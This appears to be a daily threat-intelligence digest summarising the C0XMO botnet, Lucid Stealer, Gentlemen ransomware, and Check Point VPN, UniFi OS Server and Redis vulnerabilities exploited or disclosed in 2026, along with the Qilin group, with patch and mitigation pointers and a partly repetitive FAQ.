Attackers are slashing through perimeter defenses by exploiting a logic flaw in Check Point VPNs, letting them bypass authentication and open VPN sessions without valid credentials. Cyware highlights how this vulnerability, tracked as CVE-2026-50751, is already under active attack, with exploitation ramping up since May 7, 2026. Organizations relying on deprecated IKEv1 protocols now face the risk of ransomware and data theft as Qilin actors leverage this flaw to breach remote-access infrastructure.

Credential theft is evolving as Lucid Stealer expands its reach beyond browser logins, targeting 18 browsers, crypto wallets, and Discord tokens. Attackers use a Node.js SEA wrapper and a multi-tenant web panel to automate theft and enable remote control, putting both personal and enterprise accounts at risk of takeover and fraud.

A years-old flaw in DD-WRT routers is fueling the growth of the C0XMO botnet, which hijacks devices with UPnP enabled and turns them into DDoS launchpads. Home users and organizations risk losing control of their connectivity as compromised routers are conscripted into attacks that disrupt services across the internet.

Top Malware Reported in the Last 24 Hours

C0XMO botnet hijacks DD-WRT routers

C0XMO is a botnet that hijacks DD-WRT routers by exploiting the years-old flaw CVE-2021-27137, turning infected devices into DDoS launchpads. C0XMO removes competing malware, uses compromised routers for denial-of-service attacks, and scans for additional vulnerable routers to expand its network. C0XMO can only compromise routers when UPnP is enabled, a setting not enabled by default, making exposed configurations the primary risk. C0XMO targets both organizations and home users, impacting connectivity and conscripting internet links into disruptive attacks. A patch or update may be available, and disabling UPnP is recommended to mitigate risk.

Lucid Stealer raids browsers and wallets

Lucid Stealer is a credential-stealing malware that targets 18 browsers, crypto wallets, and Discord tokens, while also enabling remote access for attackers. Lucid Stealer hides its payload using a Node.js SEA wrapper and includes tooling for theft and hands-on abuse after infection. Lucid Stealer features a hosted multi-tenant web control panel and specific upload/log URI sequences, indicating ongoing development and organized operation. Lucid Stealer is distributed through Telegram-linked channels, putting both everyday users and employees at risk. Researchers emphasize that detection may depend more on behavioral patterns than on static file hashes, as Lucid Stealer evolves rapidly.

Gentlemen ransomware spreads across ESXi fleets

Gentlemen is a double-extortion ransomware operation active since July 2025 that targets Windows, Linux, and ESXi environments, encrypting systems and pressuring victims with stolen data. Gentlemen performs broad reconnaissance and exfiltrates data using tools such as WinSCP, increasing leverage over affected organizations. Gentlemen moves laterally by creating scheduled tasks, modifying registry keys, and disabling security tools for persistence and defense evasion. Gentlemen spreads by abusing Group Policy Objects, enabling rapid impact across multiple systems. AttackIQ’s emulation demonstrates how operationalized and repeatable the group’s campaign has become.

Top Vulnerabilities Reported in Last 24 hours

CVE-2026-50751: Authentication bypass in Check Point VPN (CVSS not specified)

CVE-2026-50751 is an authentication bypass vulnerability in Check Point VPN products that use the deprecated IKEv1 protocol. Successful exploitation allows attackers to establish VPN sessions without valid credentials, enabling unauthorized network access and potential data theft. CVE-2026-50751 is already being actively exploited in the wild, with activity starting on May 7, 2026 and increasing in early June. Check Point attributes exploitation to Qilin ransomware actors and notes the use of dedicated VPS infrastructure. A related certificate-validation issue, CVE-2026-50752, has been disclosed but not yet exploited. A fix is available via Check Point hotfixes for affected Mobile Access / SSL VPN, Remote Access VPN, and Spark Firewall products.

UniFi OS Server vulnerability chain enables root takeover (CVE-2026-34908, CVE-2026-34909, CVE-2026-34910, CVE-2026-33000)

A newly detailed vulnerability chain in UniFi OS Server (CVE-2026-34908, CVE-2026-34909, CVE-2026-34910, CVE-2026-33000) enables unauthenticated remote code execution leading to root access. Attackers can seize the host and all managed assets by chaining an authentication-gateway bypass, path-traversal mismatch, and command-injection sink. No active exploitation has been reported. Once root is obtained, attackers can access JWT signing keys, TLS private keys, cloud tokens, user databases, RADIUS and Wi‑Fi credentials, and biometric data, and can push configuration and firewall changes. A fix is available in UniFi OS Server 5.0.8.

CVE-2026-23631: Redis ‘DarkReplica’ flaw risks server hijack

CVE-2026-23631 is a critical vulnerability in Redis dubbed DarkReplica, allowing attackers with valid credentials to execute remote code and potentially hijack servers by corrupting memory in the replication subsystem. Successful exploitation involves triggering a race during replication while Redis runs Lua, using Lua primitives and heap manipulation to redirect execution. No active exploitation has been reported. The flaw is especially impactful in cloud-native and microservices environments where Redis manages sessions, queues, and application state, risking broad infrastructure compromise. A fix is available in Redis 7.2.14, 7.4.9, 8.2.6, 8.4.3, and 8.6.3.

Top Threat Actors Reported in Last 24 hours

Qilin exploits Check Point VPN bypass

Qilin (suspected ransomware group) is believed to originate from an unknown region and is primarily motivated by financial gain. Qilin exploits CVE-2026-50751 by leveraging a logic flaw in certificate validation within deprecated IKEv1 VPN flows. Qilin uses dedicated VPS infrastructure and targets Check Point Mobile Access / SSL VPN, Remote Access VPN, and Spark Firewall products. Qilin’s campaign enables network intrusion, data theft, and business disruption, especially if ransomware is deployed post-access. Exploitation began on May 7, 2026 and increased in early June, while a related issue (CVE-2026-50752) has not yet been exploited.

Frequently Asked Questions

1. What is C0XMO? C0XMO is a botnet that’s taking over DD-WRT routers by exploiting a years-old flaw, CVE-2021-27137, and turning infected devices into DDoS launchpads. It can only pull off the takeover when UPnP is enabled—a setting that is not on by default for DD-WRT—making exposed configurations the key risk factor.

2. What is Lucid Stealer? Lucid Stealer is a credential-stealing malware that targets 18 browsers, crypto wallets, and Discord tokens, while also packing remote-access capability that can let criminals take control of a victim machine. It hides its payload using a Node.js SEA wrapper and bundles tooling designed to make theft and hands-on abuse easier once it lands.

3. What is Gentlemen? Gentlemen is a double-extortion ransomware operation active since July 2025 that targets Windows, Linux, and ESXi environments, aiming to encrypt systems while pressuring victims with stolen data. It performs broad reconnaissance and exfiltrates data using tools such as WinSCP, increasing the leverage it holds over affected organizations.

4. What is CVE-2026-50751? Attackers are actively exploiting an authentication bypass in Check Point VPN deployments that use the deprecated IKEv1 protocol, letting them establish VPN sessions without valid credentials (CVE-2026-50751). The bypass stems from a logic flaw in certificate validation, turning a perimeter access system into an entry point for unauthorized network access and potential data theft.

5. What is CVE-2026-34908? A newly detailed vulnerability chain in UniFi OS Server can be abused for unauthenticated remote code execution that ends in root access, allowing an attacker to seize the host and everything it manages (CVE-2026-34908, CVE-2026-34909, CVE-2026-34910, CVE-2026-33000). The chain combines an authentication-gateway bypass, a path-traversal mismatch, and a command-injection sink, enabling crafted web requests to turn the admin interface into a remote shell.

6. What is CVE-2026-23631? A critical Redis vulnerability dubbed DarkReplica can let attackers with valid credentials execute remote code and potentially hijack servers by corrupting memory in Redis’s replication subsystem (CVE-2026-23631). The reported exploit path hinges on triggering a race during replication while Redis runs Lua, using Lua primitives and heap manipulation to steer execution toward attacker-controlled behavior.

7. What is Qilin? Active exploitation of CVE-2026-50751 is giving attackers a way to open Check Point VPN sessions without valid credentials, turning remote-access infrastructure into a fast path for network intrusion. The activity has been linked in the alert’s actor profile to Qilin ransomware operations, and they are exploiting a logic flaw in certificate validation in the deprecated IKEv1 VPN flow.

8. What is Lucid Stealer? Lucid Stealer is a credential-theft operation that goes further than browser logins, targeting 18 browsers, crypto wallets, and Discord tokens while also enabling hands-on control of infected machines. After first identifying the malware, researchers described it as a small but organized setup, complete with a hosted multi-tenant web panel and ongoing development plans to re-platform from Node.js to Java.

9. What is Gentlemen? Gentlemen is a ransomware group active since July 2025 that combines encryption with data theft, aiming to squeeze victims through a double-extortion model. Researchers tracking their tradecraft say they target Windows, Linux, and ESXi environments, widening the blast radius for organizations that depend on virtualized infrastructure.